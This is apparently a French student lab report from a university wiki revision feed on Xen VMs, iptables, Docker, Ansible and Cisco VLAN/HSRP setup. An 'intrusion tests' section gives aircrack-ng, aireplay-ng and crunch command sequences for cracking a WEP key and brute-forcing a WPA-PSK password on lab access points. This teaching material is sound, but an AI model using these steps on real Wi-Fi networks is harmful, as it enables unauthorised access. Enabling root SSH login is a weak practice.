 root@cordouan:~# xen-create-image --hostname=private-mycoplasma --ip=ip 192.168.0.2 --dir=/usr/local/xen&lt;br /&gt;
 root@cordouan:~# xl create private-mlycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
Il faut suivre les logs de la création de la machine virtuelle avec le fichier suivant:&lt;br /&gt;
 root@cordouan:~# tail -f /var/log/xen-tools/private-mycoplasma.log&lt;br /&gt;
&lt;br /&gt;
Pour accèder une première fois à la machine virtuelle, il faut utiliser cette commande car SSH n'est pas encore autorisé.&lt;br /&gt;
 root@cordouan:~# xl console private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
Pour l'activer voici les modifications, il faut remplacer la ligne suivante de ce fichier /etc/ssh/sshd_config :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot;  '''par'''  &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
&lt;br /&gt;
Il est possible de se connecter en SSH  et de paramétrer le proxy : &lt;br /&gt;
 root@cordouan:~# ssh root@192.168.0.2&lt;br /&gt;
 root@private-mycoplasma:~# export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# export https_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# xen-create-image --hostname=herpesgenital --dhcp --dir=/usr/local/xen --force&lt;br /&gt;
&lt;br /&gt;
Il faut modifier l'adresse mac, pour avoir une adresse mac unique pour chaque binôme, et il faut configurer le bridge.&lt;br /&gt;
 vif = [ 'mac=00:16:3E:2B:FF:6A,bridge=IMA5sc-priv' ]&lt;br /&gt;
&lt;br /&gt;
Voici notre nouvelle structure :&lt;br /&gt;
[[Fichier:G2_Structure.png|center|800px]]&lt;br /&gt;
&lt;br /&gt;
Pour y arriver, il faut modifier les fichiers /etc/network/interfaces des deux machines virtuelles avec les adresses, Gateway, et netmask marque sur la photo ci-dessus. Et valider les modifications avec les commandes habituelles : ifdown eth'''i''' et ifup eth'''i'''&lt;br /&gt;
&lt;br /&gt;
=== Mascarade ===&lt;br /&gt;
&lt;br /&gt;
 iptables -P FORWARD DROP&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -s 192.168.0.0/24&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -d 192.168.0.0/24&lt;br /&gt;
 iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.0.0/24&lt;br /&gt;
 echo 1 &amp;gt; /proc/sys/net/ipv4/ip_forward&lt;br /&gt;
 apt install iptables-persistent&lt;br /&gt;
 &lt;br /&gt;
Il faut ensuite décommenter &lt;br /&gt;
 net.ipv4.ipforward=1&lt;br /&gt;
&lt;br /&gt;
=== Création du conteneur ===&lt;br /&gt;
&lt;br /&gt;
Il est important dans cette partie que tous les binômes se mettent d'accord pour installer le même package de docker &lt;br /&gt;
 root@mycoplasma:~/#  ansible-galaxy install geerlingguy.docker&lt;br /&gt;
&lt;br /&gt;
Voici le fichier DockerFile que l'on a codé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~/test# cat docker/Dockerfile &lt;br /&gt;
&lt;br /&gt;
 FROM centos:latest&lt;br /&gt;
 MAINTAINER NewstarCorporation&lt;br /&gt;
 RUN yum -y install httpd&lt;br /&gt;
 COPY mycoplasma/index.html /var/wwww/html/index.html&lt;br /&gt;
 CMD [&amp;quot;/usr/sbin/httpd&amp;quot;, &amp;quot;-D&amp;quot;, &amp;quot;FOREGROUND&amp;quot;]&lt;br /&gt;
 EXPOSE 80&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On a eu le problème suivant lorsqu'on souhaite visiter notre site : &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_mycoplasmaSite.png|center|900px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker ps =&amp;gt; Notre docker &amp;quot;mycoplasma&amp;quot;  tourne donc  ce n'est pas le problème.&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker exec -it &amp;lt;CONTAINER ID&amp;gt; /bash/bin &lt;br /&gt;
 root@&amp;lt;CONTAINER ID&amp;gt;:~/# ls /var/www/html &lt;br /&gt;
&lt;br /&gt;
Avec cette dernière commande, on peut voir que le fichier index.html ne s'est pas copié malgré les commandes du Dockerfile. Pourtant le Docker build s'est exécuté sans afficher d'erreurs. On peut voir les logs pour avoir une idée : &lt;br /&gt;
  root@corduan:~/# docker logs &amp;lt;CONTAINER ID&amp;gt;&lt;br /&gt;
Voici le résultat : &lt;br /&gt;
 AH00558: httpd: Could not reliably determine the server's fully qualified domain name, using 172.17.0.5. Set the 'ServerName' directive globally to suppress this message&lt;br /&gt;
&lt;br /&gt;
=== Configuration des serveurs internes ===&lt;br /&gt;
&lt;br /&gt;
===Equilibreur de charge===&lt;br /&gt;
&lt;br /&gt;
==Tests d’intrusion==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
Pour scanner l'environnement Wi-Fi, on utilise l'outil airodump-ng. On remarque qu'il y a deux types de wifi, les cracottes avec un c et les kracottes avec un k.&lt;br /&gt;
On lance l'interface en mode moniteur : &lt;br /&gt;
 airmon-ng start  wlan0mon&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On a choisi de casser la clé WEP de la cracotte5 sur le channel 2, on enregistre les paquets dans webPack.&lt;br /&gt;
 airodump-ng -c 2 –-bssid 04:DA:D2:9C:5O:5A -w wepPack wlan0mon&lt;br /&gt;
&lt;br /&gt;
La commande suivante permet de se faire passer pour un client afin de générer de l'activité sur le réseau.&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a 04:DA:D2:9C:5O:5A wlan0mon&lt;br /&gt;
&lt;br /&gt;
On utilise les paquets enregistrés pour réaliser le cassage:&lt;br /&gt;
 aircrack-ng wepDico*.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:g2_wep.png|center|600 px]]&lt;br /&gt;
&lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
Il faut lancer la commande ip a : récupérer le nom de l'interface wifi : &amp;quot;&amp;quot;wlx40a5ef0f6518&amp;quot;&amp;quot;. Il faut le lancer avec la commande :&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite écouter le réseau, on récupère alors le channel(2), le nom du wifi, le BSSID (04:DA:D2:9C:5O:5A) avec la commande suivante:&lt;br /&gt;
 airodump-ng --encrypt wpa wlan0mon&lt;br /&gt;
Nous avons choisi de cracker &amp;quot;kracote03&amp;quot;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon --bssid 04:DA:D2:9C:5O:5A --ch 2 -w capture&lt;br /&gt;
&lt;br /&gt;
Il faut l'arreter une fois qu'on obtient un handshake &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_WPA.png| 800 px|center]]&lt;br /&gt;
&lt;br /&gt;
Pour générer un dictionnaire, on a besoin de la commande suivante : &lt;br /&gt;
 sudo apt-get update&lt;br /&gt;
 sudo apt-get install crunch&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 -o dico.txt 0123456789&lt;br /&gt;
&lt;br /&gt;
* 8 8 : donne des codes de 8 caractères au minimum et au maximum&lt;br /&gt;
&lt;br /&gt;
On lance cette commande : &lt;br /&gt;
 airodump-ng -c 2 --bssid 04:DA:D2:9C:5O:5A -w ./home/pifou/crack wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Voici une capture de la commande :&lt;br /&gt;
 aircrack crack/capture.cap -w dico.txt &lt;br /&gt;
[[Fichier:G2_catch.png|center]]&lt;br /&gt;
&lt;br /&gt;
On remarque ce la photo ci dessus que la commande a pris 21 min et 42 sec.&lt;br /&gt;
&lt;br /&gt;
== Partie  ASR ==&lt;br /&gt;
&lt;br /&gt;
=== Ansible ===&lt;br /&gt;
&lt;br /&gt;
Ansible permet l'automatisation par connexion sans mot de passe.&lt;br /&gt;
Il faut d'abord générer une clef asymétrique :&lt;br /&gt;
 ssh-keygen -t rsa&lt;br /&gt;
&lt;br /&gt;
Installation de la clef publique sur les machines virtuelles 192.168.0.1 à 192.168.0.6  :&lt;br /&gt;
 cat .ssh/id_rsa.pub | ssh 192.168.0.1 &amp;quot;cat &amp;gt;&amp;gt; /root/.ssh/authorized_keys2&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Il faut  installer Ansible : &lt;br /&gt;
 apt install ansible&lt;br /&gt;
====Hosts====&lt;br /&gt;
Ensuite il faut rédiger l'inventaire ( /etc/ansible/hosts ) c'est un fichier yaml, il faut très attention à la syntaxe. Ce fichier regroupe le parc informatique :&lt;br /&gt;
&lt;br /&gt;
 all:&lt;br /&gt;
 hosts:&lt;br /&gt;
  interne:&lt;br /&gt;
    ansible_host: 192.168.0.2&lt;br /&gt;
 children:&lt;br /&gt;
  serveur-web:&lt;br /&gt;
   hosts:&lt;br /&gt;
    192.168.0.[1:6]&lt;br /&gt;
&lt;br /&gt;
====Playbooks====&lt;br /&gt;
&lt;br /&gt;
Maintenant qu'on a défini toutes les machines dans notre parc et qu'on peut se connecter automatique, on peut exécuter une commande à distance sur tout le parc à l'aide d'Ansible.&lt;br /&gt;
Un &amp;quot;playbook&amp;quot; c'est une liste des tâches à effectuer sur ces machines.&lt;/div&gt;</summary>
		<author><name>Aaitmouh</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=52008</id>
		<title>TP sysres IMA5sc 2019/2020 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=52008"/>
				<updated>2020-01-05T15:04:08Z</updated>
		
		<summary type="html">&lt;p&gt;Aaitmouh : /* Configuration du commutateur 1 (COM-1) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot;/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Présentation générale=&lt;br /&gt;
&lt;br /&gt;
Travaux pratiques protocoles avancés. Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6.&lt;br /&gt;
&lt;br /&gt;
Le cours se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Reseau.IMA5sc/ adresse]&lt;br /&gt;
Le sujet du TP se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html adresse]&lt;br /&gt;
&lt;br /&gt;
=Réalisation du TP=&lt;br /&gt;
&lt;br /&gt;
== Installation dans la machine virtuelle Xen ==&lt;br /&gt;
Nous avons acheté notre domaine : mycoplasma.site sur le site gandi. Il faut créer la machine virtuelle Xen Linux sur le ''dom0 cordouan.insecserv.deule.net''&lt;br /&gt;
&lt;br /&gt;
Donc il faut se connecter en shh à Cordouan: &lt;br /&gt;
 ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
Puis créer notre machine virtuelle : &lt;br /&gt;
 xen-create-image --hostname=mycoplasma --dhcp --dir=/usr/local/xen --dist=buster&lt;br /&gt;
 xl create mycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
On a ensuite installer les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind :&lt;br /&gt;
 sudo apt-get install openssh-server&lt;br /&gt;
 sudo apt-get install apache2&lt;br /&gt;
 sudo apt-get install -y bind9&lt;br /&gt;
&lt;br /&gt;
Pour afficher les logs et savoir si l'installation à bien lieu : &lt;br /&gt;
   tail -f /var/log/xen-tools/mycoplasma.log&lt;br /&gt;
=== Accès Internet et Permettre SSH ===&lt;br /&gt;
Une fois la VM créée (semaine 1), il faut installer les packages, donc il faut lui donner l'accès à internet. Il faut modifier le fichier suivant etc/network/interfaces. Pour enregistrer les modifications, il faut exécuter les commandes: if down eth0, ifup eth0.&lt;br /&gt;
 &lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour le moment, pour se connecter à la Machine virtuelle, on utilise la commande suivante: &lt;br /&gt;
 xl console mycoplasma&lt;br /&gt;
&lt;br /&gt;
====SSH====&lt;br /&gt;
Mais il y a une seconde façon d'accéder à notre VM: c'est en utilisant SSH. Pour le faire il faut remplacer la ligne suivante :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot; &lt;br /&gt;
par &lt;br /&gt;
 &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
de ce fichier etc/ssh/sshd_config.&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
=== L’architecture générale ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-generale.png|right|180 px|thumb]]&lt;br /&gt;
L'objectif que l'on souhaite réaliser dans cette partie est une architecture capable de résister à la défaillance de quelques uns des équipements réseau qui la composent par le biais de la redondance.&lt;br /&gt;
&lt;br /&gt;
Nous disposons, pour la réalisation, de deux commutateurs et de deux routeurs et deux bornes wifi répartis entre les deux salles E304 et E306. &lt;br /&gt;
&lt;br /&gt;
Nous avons sur les deux terminaisons de notre architecture:&lt;br /&gt;
&lt;br /&gt;
* Le serveur XEN qui abrite des machines virtuelles avec les différents services qui y sont implantés.&lt;br /&gt;
* Le réseau de l'école.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
Le schéma de principe ci-joint, résume l'architecture proposée.&lt;br /&gt;
&lt;br /&gt;
On peut ainsi voir à partir de ce schéma que tant que nous avons au minimum un routeur et un commutateur fonctionnels l’infrastructure pourra toujours assurer le service&lt;br /&gt;
&lt;br /&gt;
Entre autres, on doit satisfaire le cahier des charges suivant:&lt;br /&gt;
* Un routage IPv4&lt;br /&gt;
* Un routage IPv6&lt;br /&gt;
* Interconnexion avec Internet (IPv4)&lt;br /&gt;
* Interconnexion avec Internet (IPv6)&lt;br /&gt;
* Sécurisation du réseau en implantant le protocol VRRP sur les routeurs.&lt;br /&gt;
* Confguration des bornes wifi&lt;br /&gt;
&lt;br /&gt;
===Organisation du travail ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-E304.png|right|180 px|thumb]]&lt;br /&gt;
Nous avons pris l'initiative de nous répartir la réalisation de l'infrastructure et notre groupe s'est principalement chargé de l'implémentation sur la partie E304.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Sur cette partie nous devons donc configurer le commutateur (COM-1) pour:&lt;br /&gt;
* Communiquer avec la serveur XEN&lt;br /&gt;
* Communiquer avec le routeur R1 en E304 et le R2 en E306.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Et configurer le routeur R1 pour:&lt;br /&gt;
* L'interconnexion des deux commutateurs COM-1 et COM-2 avec le réseau de l'école et internet &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Le schéma proposé à droite résume le choix des interfaces pour la réalisation de l'interconnexion des équipements.&lt;br /&gt;
&lt;br /&gt;
===Réalisation===&lt;br /&gt;
Rappelons la table des adressages convenue en phase d'architecture:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! VLAN !! Réseau IPV4 !! Réseau IPV6 !! IP routeur 1 !! IP routeur 2 !! Routeur virtuel !! Nom VM !! IP VM !! IP VM Private&lt;br /&gt;
|-&lt;br /&gt;
| XEN&lt;br /&gt;
| 200&lt;br /&gt;
| 193.48.57.176/28 &lt;br /&gt;
| 2001:660:4401:60AB::/64 &lt;br /&gt;
| 193.48.57.188/28&lt;br /&gt;
| 193.48.57.189/28&lt;br /&gt;
| 193.48.57.190/28&lt;br /&gt;
| ***&lt;br /&gt;
| 193.48.57.176/28&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Interconnection&lt;br /&gt;
| 131&lt;br /&gt;
| 10.60.100.0/24&lt;br /&gt;
| ***&lt;br /&gt;
| 10.60.100.1/24&lt;br /&gt;
| 10.60.100.2/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| 101 &lt;br /&gt;
| 10.60.101.0/24&lt;br /&gt;
| 2001:660:4401:60A1::/64 &lt;br /&gt;
| 10.60.101.1/24&lt;br /&gt;
| 10.60.101.2/24&lt;br /&gt;
| 10.60.101.3/24&lt;br /&gt;
| 6phil&lt;br /&gt;
| 193.48.57.177/28&lt;br /&gt;
| 192.168.0.1&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 2&lt;br /&gt;
| 102&lt;br /&gt;
| 10.60.102.0/24&lt;br /&gt;
| 2001:660:4401:60A2::/64 &lt;br /&gt;
| 10.60.102.1/24&lt;br /&gt;
| 10.60.102.2/24&lt;br /&gt;
| 10.60.102.3/24&lt;br /&gt;
| mycoplasma&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
| 192.168.0.2&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 3&lt;br /&gt;
| 103 &lt;br /&gt;
| 10.60.103.0/24&lt;br /&gt;
| 2001:660:4401:60A3::/64&lt;br /&gt;
| 10.60.103.1/24&lt;br /&gt;
| 10.60.103.2/24&lt;br /&gt;
| 10.60.103.3/24&lt;br /&gt;
| herpesgenital&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
| 192.168.0.3&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 4&lt;br /&gt;
| 104 &lt;br /&gt;
| 10.60.104.0/24&lt;br /&gt;
| 2001:660:4401:60A4::/64 &lt;br /&gt;
| 10.60.104.1/24&lt;br /&gt;
| 10.60.104.2/24&lt;br /&gt;
| 10.60.104.3/24&lt;br /&gt;
| chlamydiae&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
| 192.168.0.4&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 5&lt;br /&gt;
| 105 &lt;br /&gt;
| 10.60.105.0/24&lt;br /&gt;
| 2001:660:4401:60A5::/64 &lt;br /&gt;
| 10.60.105.1/24&lt;br /&gt;
| 10.60.105.2/24&lt;br /&gt;
| 10.60.105.3/24&lt;br /&gt;
| chaudepisse&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
| 192.168.0.5&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 6&lt;br /&gt;
| 106 &lt;br /&gt;
| 10.60.106.0/24&lt;br /&gt;
| 2001:660:4401:60A6::/64 &lt;br /&gt;
| 10.60.106.1/24&lt;br /&gt;
| 10.60.106.2/24&lt;br /&gt;
| 10.60.106.3/24&lt;br /&gt;
| blennoragie&lt;br /&gt;
| 193.48.57.182/28&lt;br /&gt;
| 192.168.0.6&lt;br /&gt;
|-&lt;br /&gt;
| Autres&lt;br /&gt;
| 300&lt;br /&gt;
| 10.60.200.0/24&lt;br /&gt;
| 2001:660:4401:60AA::/64 &lt;br /&gt;
| 10.60.200.1/24&lt;br /&gt;
| 10.60.200.2/24&lt;br /&gt;
| 10.60.200.3/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir, les VMs exposées possèdent chacune deux adresses IPv4 sur deux réseaux différents:&lt;br /&gt;
#Le réseau routé     :  193.48.57.176/28      (Class C)&lt;br /&gt;
#Le réseau non-routé :  10.10.0.0/16          (Class A)&lt;br /&gt;
&lt;br /&gt;
Nous devons allouer sur le réseau non-routé, dit privé, un VLAN pour chaque groupe pour qu'il puisse y connecter son client Wifi en plus des VLANs fonctionnels.&lt;br /&gt;
 &lt;br /&gt;
====Configuration du commutateur 1 (COM-1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des VLANs=====&lt;br /&gt;
Pour la création des VLANs nous utilisons la suite de commandes ci-dessous:&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  vlan &amp;lt;NUMERO&amp;gt;&lt;br /&gt;
   name &amp;lt;NOM&amp;gt;&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
avec les couples de valeurs:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! &amp;lt;NUMERO&amp;gt; !! &amp;lt;NOM&amp;gt; &lt;br /&gt;
|-&lt;br /&gt;
| 101&lt;br /&gt;
| VLAN0101&lt;br /&gt;
|-&lt;br /&gt;
| 102&lt;br /&gt;
| VLAN0102 &lt;br /&gt;
|-&lt;br /&gt;
| 103&lt;br /&gt;
| VLAN0103&lt;br /&gt;
|-&lt;br /&gt;
| 104&lt;br /&gt;
| VLAN0104&lt;br /&gt;
|-&lt;br /&gt;
| 105&lt;br /&gt;
| VLAN0105&lt;br /&gt;
|-&lt;br /&gt;
| 106&lt;br /&gt;
| VLAN0106&lt;br /&gt;
|-&lt;br /&gt;
| 131&lt;br /&gt;
| INTERCNX&lt;br /&gt;
|-&lt;br /&gt;
| 200&lt;br /&gt;
| XEN&lt;br /&gt;
|-&lt;br /&gt;
| 300&lt;br /&gt;
| MANAGEMENT&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Donner au commutateur 1 une IP dans le Vlan de management : &lt;br /&gt;
&lt;br /&gt;
 conf t &lt;br /&gt;
  interface Vlan300&lt;br /&gt;
  ip address 10.60.200.254 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
En première approche, nous avons souhaité activer une connexion sécurisée (SSH) de management en créant des clés RSA et une configuration VTY mais le commutateur n'a pas l'air, à première vue, d'implémenter cette fonctionnalité  nous laissant qu'avec du Telnet (en Clair) que nous avons donc décidé de ne pas configurer.&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers XEN=====&lt;br /&gt;
Cette connexion doit faire transiter les différents VLANs et doit donc être en Trunk.&lt;br /&gt;
&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet1/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport trunk encapsulation dot1q         # On utilise le standard 802.1q pour l'encapsulation&lt;br /&gt;
   switchport mode trunk                        # On met l'interface en mode Trunk&lt;br /&gt;
   no shut&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R1=====&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R2=====&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
 interface GigabitEthernet1/2&lt;br /&gt;
  switchport&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers Borne Wifi=====&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/4&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
=====Management=====&lt;br /&gt;
&lt;br /&gt;
====Configuration du Routeur 1 (R1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des Réseaux virtuels=====&lt;br /&gt;
La notion de Bridge Domain Interface (BDI)&lt;br /&gt;
&lt;br /&gt;
HSRP: Hot standby router protocol [https://en.wikipedia.org/wiki/Hot_Standby_Router_Protocol plus]&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface BDI101&lt;br /&gt;
   ip address 10.60.101.1 255.255.255.0                # adresse IPv4 locale&lt;br /&gt;
   standby version 2                                   # utilisation du protocol HSRP version 2 pour la haute disponibilité dans le cas où un routeur tombe en panne&lt;br /&gt;
   standby 101 ip 10.60.101.3                          # on définit un standby group pour cette interface avec l'adresse du routeur virtuel&lt;br /&gt;
   standby 101 preempt                                 # fait en sorte que le routeur actif avec la plus grande priorité prenne en charge le routage par préemption sur ce groupe &lt;br /&gt;
   ipv6 address 2001:660:4401:60A1::/64 eui-64         # configuration des adresses IPv6&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A1::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
  interface BDI102&lt;br /&gt;
   ip address 10.60.102.1 255.255.255.0&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 102 ip 10.60.102.3&lt;br /&gt;
   standby 102 preempt&lt;br /&gt;
   ipv6 address 2001:660:4401:60A2::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A2::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI103&lt;br /&gt;
  ip address 10.60.103.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 103 ip 10.60.103.3&lt;br /&gt;
  standby 103 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI104&lt;br /&gt;
  ip address 10.60.104.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 104 ip 10.60.104.3&lt;br /&gt;
  standby 104 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI105&lt;br /&gt;
  ip address 10.60.105.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 105 ip 10.60.105.3&lt;br /&gt;
  standby 105 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 105 par le R1&lt;br /&gt;
  standby 105 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI106&lt;br /&gt;
  ip address 10.60.106.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 106 ip 10.60.106.3&lt;br /&gt;
  standby 106 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 106 aussi par le R1&lt;br /&gt;
  standby 106 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI131&lt;br /&gt;
  ip address 192.168.222.10 255.255.255.248&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI200&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 200 ip 193.48.57.190&lt;br /&gt;
  standby 200 preempt&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
 exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers Réseau école =====&lt;br /&gt;
 interface GigabitEthernet0/0/0&lt;br /&gt;
  no ip address&lt;br /&gt;
  media-type rj45&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 131 ethernet&lt;br /&gt;
   encapsulation dot1q 131&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain 131&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-1 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/1&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/1 , et pour '''&amp;lt;NUMERO&amp;gt;''' ={ 101, 102, 103, 104, 105, 106, 200 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
